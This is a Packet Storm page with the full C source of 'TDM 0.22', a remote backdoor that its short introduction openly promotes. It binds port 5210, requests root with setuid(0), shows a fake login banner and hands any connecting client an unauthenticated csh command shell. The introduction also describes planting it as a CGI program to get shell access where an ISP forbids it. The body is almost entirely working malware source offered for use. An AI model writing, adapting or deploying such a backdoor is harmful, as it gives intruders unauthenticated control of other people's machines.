This is a backdoor program which can be accessed remotely as telnetd. You can login without username and password to the host which is installed this program. This program also can use as CGI program if you send the compiled binary and change the permittion to 755, you can use the UNIX shell command on the ISP that doesn't accept the shell account.
ba8473ce86555572052efc2540c52cbe9ac33dc41a08daf855dc0478fbd66e32/*=============================================================================
TDM Version 0.22
The Shadow Penguin Security (https://shadowpenguin.backsection.net)
Written by UNYUN (unewn4th@usa.net)
=============================================================================
*/
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <errno.h>
#include <unistd.h>
#include <netinet/in.h>
#include <limits.h>
#include <netdb.h>
#include <arpa/inet.h>
#define MAX_CLIENTS 5
#define TMP_FILE "/tmp/.ush"
#define PORT_NUM 5210
#define CATBUF 4000
int get_connection(socket_type, port, listener)
int socket_type;
int port;
int *listener;
{
struct sockaddr_in address;
struct sockaddr_in acc;
int listening_socket;
int connected_socket = -1;
int new_process;
int reuse_addr = 1;
int acclen=sizeof(acc);
memset((char *) &address, 0, sizeof(address));
address.sin_family = AF_INET;
address.sin_port = htons(port);
address.sin_addr.s_addr = htonl(INADDR_ANY);
listening_socket = socket(AF_INET, socket_type, 0);
if (listening_socket < 0) {
perror("socket");
exit(1);
}
if (listener != NULL) *listener = listening_socket;
setsockopt(listening_socket,SOL_SOCKET,SO_REUSEADDR,
(void *)&reuse_addr,sizeof(reuse_addr));
if (bind(listening_socket,(struct sockaddr *)&address,sizeof(address))<0){
perror("bind");
close(listening_socket);
exit(1);
}
if (socket_type == SOCK_STREAM){
listen(listening_socket, MAX_CLIENTS);
while(connected_socket < 0){
connected_socket = accept(listening_socket, &acc, &acclen);
if (connected_socket < 0){
if (errno != EINTR){
perror("accept");
close(listening_socket);
exit(1);
}else continue;
}
new_process=fork();
if (new_process<0){
perror("fork");
close(connected_socket);
connected_socket = -1;
}else{
if (new_process == 0) {
close(listening_socket);
if (listener!=NULL) *listener = -1;
}else{
close(connected_socket);
connected_socket = -1;
}
}
}
return connected_socket;
}else return listening_socket;
}
int sock_write(sockfd, buf, count)
int sockfd;
char *buf;
size_t count;
{
size_t bytes_sent = 0;
int this_write;
while (bytes_sent < count) {
do
this_write = write(sockfd, buf, count - bytes_sent);
while ( (this_write < 0) && (errno == EINTR) );
if (this_write <= 0)
return this_write;
bytes_sent += this_write;
buf += this_write;
}
return count;
}
int sock_gets(sockfd, str, count)
int sockfd;
char *str;
size_t count;
{
int bytes_read;
int total_count = 0;
char *current_position;
char last_read = 0;
current_position = str;
while (last_read != 10) {
bytes_read = read(sockfd, &last_read, 1);
if (bytes_read <= 0) return -1;
if ((total_count<count)&&(last_read!=10)&&(last_read!=13)){
current_position[0] = last_read;
current_position++;
total_count++;
}
}
if (count > 0)
current_position[0] = 0;
return total_count;
}
int sock_puts(sockfd, str)
int sockfd;
char *str;
{
int sock_write();
char buf[2000];
sprintf(buf,"\r%s",str);
return sock_write(sockfd, buf, strlen(buf));
}
int main(argc, argv)
int argc;
char *argv[];
{
int get_connection();
int sock_gets();
int sock_puts();
int c,f,i;
FILE *fp;
int sock;
int connected = 1;
char buffer[1024];
char buf2[CATBUF];
char cdir[2000];
char cstdir[2000];
static int textmode=0;
static int listensock = -1;
setuid(0);
setgid(0);
sock = get_connection(SOCK_STREAM, PORT_NUM, &listensock);
sock_puts(sock,"Last login: Sun Jan 1 00:00:00 from root@hacker.moon\n");
sock_puts(sock,"ShadowPenguinSecurity Inc. UnyunOS 5.4 Generic January 2010\n");
sock_puts(sock,"You have new hacking tool.\n");
sprintf(buf2,"pwd > %s",TMP_FILE);
system(buf2);
if ((fp=fopen(TMP_FILE,"r"))==NULL)
strcpy(cdir,"/");
else{
fscanf(fp,"%s",cdir);
fclose(fp);
}
strcpy(cstdir,cdir);
sprintf(buf2,"%s\n",cdir);
sock_puts(sock,buf2);
while (connected) {
if (textmode==0) sock_puts(sock,"[ush] %");
if ( sock_gets(sock, buffer, 1024) < 0) {
connected = 0;
}else{
if (strcmp(buffer,"$eof")==0){
textmode=0;
if (fp!=NULL) fclose(fp);
continue;
}
if (textmode==1){
if (fp!=NULL){
fwrite(buffer,1,strlen(buffer),fp);
putc('\n',fp);
}
continue;
}
if (strcmp(buffer,"logout")==0 || strcmp(buffer,"exit")==0 ) break;
if (strncmp(buffer,"$mktext",7)==0){
if (strlen(buffer)<9){
sock_puts(sock,"usage : $mktext [filename]\n");
}else{
if ((fp=fopen(buffer+8,"wb"))==NULL)
sock_puts(sock,"File write error\n");
else{
textmode=1;
continue;
}
}
}
if (strcmp(buffer,"cd")==0){
sprintf(cdir,cstdir);
sprintf(buf2,"%s\n",cdir);
sock_puts(sock,buf2);
continue;
}
if (strncmp(buffer,"cd ",3)==0){
strcpy(buf2,buffer+3);
if (buf2[0]=='/'){
strcpy(cdir,buf2);
sprintf(buf2,"%s\n",cdir);
}else{
strcat(cdir,"/"); strcat(cdir,buf2);
sprintf(buf2,"%s\n",cdir);
}
sock_puts(sock,buf2);
continue;
}
sprintf(buf2,"csh -f -c \"cd %s;%s\" > %s",cdir,buffer,TMP_FILE);
system(buf2);
if ((fp=fopen(TMP_FILE,"rb"))!=NULL){
for (;;){
if (feof(fp)) break;
for (i=0;i<2000;i++){
if (feof(fp)) break;
c=getc(fp);
if (c=='\n') break;
else buf2[i]=c;
}
buf2[i]=0;
strcat(buf2,"\n");
sock_puts(sock,buf2);
}
fclose(fp);
}
remove("/tmp/.ush");
}
}
close(sock);
return 0;
}
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed